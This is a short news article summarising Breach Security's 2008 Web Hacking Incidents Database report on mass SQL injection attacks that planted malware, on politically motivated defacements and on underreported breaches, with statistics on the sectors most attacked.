Breach Security has released their annual Web Hacking Incidents Database (WHID) report. The focus is on the massive SQL Injection (SQLi) attacks seen online last year, and according to the data, more than 500,000 sites were compromised. The report states that SQLi attacks, with the aim of planting Malware on a compromised site, were the number one vector of attack in 2008.
SQL Injection attacks compromised 500,000 sites in 2008(IMG:SXC)
The WHID report explains that there were three SQLi bots used in 2008, Nihaorr1, Asprox, and Evolution. They noted that while the initial attack vector was SQLi, overall the attacks more closely resembled Cross-Site Scripting methodology, citing the end goal of injecting malicious JavaScript into the victim’s browser as their logic. Moreover, the attacks were not after information on the server, they were after the user base of the website itself, taking advantage of a legit resource and exploiting the trust users have in it.
Another interesting aspect of the report centers on the site defacements seen in 2008.
“…the ideologists use the Internet to convey their message using Web hacking. Their main vehicle is defacing web sites. Web defacements are a serious problem and are a critical barometer for estimating exploitable vulnerabilities in web sites…When further analyzing defacement incidents, we found that the majority were of a political nature, targeting political parties, candidates, and government departments, often with a very specific message related to a campaign. Others have a cultural aspect, mainly Islamic hackers defacing western web sites,” adds the WHID.
Yet, while the ideologists are spreading the word, other criminals are using the compromised hosts for Phishing, Rootkit delivery, and Malware distribution. The end goal for this is information and money. A typical goal, when you consider the type of Malware used as payloads in the attacks.
When it comes to how sites were exploited in 2008, again SQLi was the largest vector. However, 29 percent of the attacks in the WHID report are listed as Unknown. This means that there was no attack method reported when the compromise was made public.
The repot attributes this to two things: Lack of Visibility of Web Traffic, where organizations lack adequate monitoring and logging, and Resistant to Public Disclosure.
“Most organizations are reluctant to publicly disclose the details of the compromise for fear of public perception and possible impact to customer confidence or competitive advantage,” the report states.
“In many cases we feel that this lack of disclosure, apart from skewing statistics, prevents fixing the root cause of the problem. This is most noticeable in malware-planting incidents, in which the focus of the remediation process is removing the malware from the site rather than fixing the vulnerabilities that enabled attackers to gain access in the first place.”
The report wraps up with a breakdown of the sectors that suffered the most attacks on their systems. Government, security, and law enforcement take the top spot with thirty-two percent, followed by Information services, retail, Internet, and education rounding out the top five.
The report is here . [Registration required]
Comment on this Story